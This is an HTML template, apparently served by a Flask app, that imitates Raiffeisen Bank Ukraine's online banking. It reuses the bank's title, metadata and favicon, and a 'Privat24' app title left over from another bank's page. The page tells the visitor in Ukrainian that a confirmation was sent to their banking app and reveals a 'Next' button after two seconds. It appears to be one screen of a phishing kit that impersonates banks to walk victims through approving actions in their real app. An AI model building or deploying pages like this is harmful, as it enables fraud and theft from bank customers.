<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed&display=swap" rel="stylesheet">
    <title>Raiffeisen Online | Raiffeisen Bank</title>
    <meta name="viewport" content="width=device-width">
    <meta property="og:url" content="https://raiffeisen.ua/">
    <meta property="og:type" content="website">
    <meta property="og:title" content="Raiffeisen Bank">
    <meta property="og:description" content="">
    <meta property="og:image" content="/img/logo.svg">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="default">
    <meta name="apple-mobile-web-app-title" content="Privat24">
    <link rel="shortcut icon" href="https://online.raiffeisen.ua/ibank/favicon.ico">
</head>
<style>
    * {
        box-sizing: border-box;
        margin: 0;
        font-family: 'Roboto Condensed', sans-serif;
    }

    body {
        background: #fff;
        color: #000;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
    }

    .container {
        display: block;
        margin: 0 auto;
        max-width: 992px;
    }

    .wrapp {
        margin: 0 auto;
        padding: 30px;
        display: flex;
        justify-content: space-between;
        align-items: center;
        flex-direction: column;
        background: #fff;
        box-shadow: 0 20px 40px rgb(44 62 80 / 15%);
        mix-blend-mode: normal;
        border-radius: 20px;
        max-width: 470px;
    }

    .img {
        margin-bottom: 80px;
        max-width: 240px;
    }

    .desc {
        margin: 25px 0;
        line-height: 24px;
        font-size: 20px;
        text-align: center;
        max-width: 300px;
    }

    .btn {
        margin: 0 auto;
        margin-top: 110px;
        display: flex;
        justify-content: center;
        align-items: center;
        background: linear-gradient(179.85deg, #ffe400 0.15%, rgba(187, 187, 187, 0) 861.01%);
        backdrop-filter: blur(2px);
        border-radius: 15px;
        border: none;
        width: 150px;
        height: 50px;
        font-size: 24px;
        line-height: 29px;
        opacity: 0;
        visibility: hidden;
        transition: all 2s ease;
        cursor: pointer;
        color: #000;
    }

    @media screen and (max-height: 685px) {
        .wrapp {
            box-sizing: border-box;
            width: 310px;
        }

        .header {
            margin-top: 40px;
        }

        .img {
            margin-top: 40px;
        }

        .btn {
            margin-top: 20px;
        }
    }
</style>

<body>
    <div class="container">
        <div class="wrapp">
            <img src="{{ url_for( 'static', filename='raif/img/logo.svg', v=1)}}" alt="phone" class="img">
            <div class="desc">Вам відправлено підтвердження у додаток</div>
            <div class="btn" id="btn">Далi</div>
        </div>
    </div>
</body>
<script>
    let btn = document.getElementById('btn')
    setTimeout(() => {
        btn.style.visibility = 'visible'
        btn.style.opacity = '1'
    }, 2000)
</script>

</html>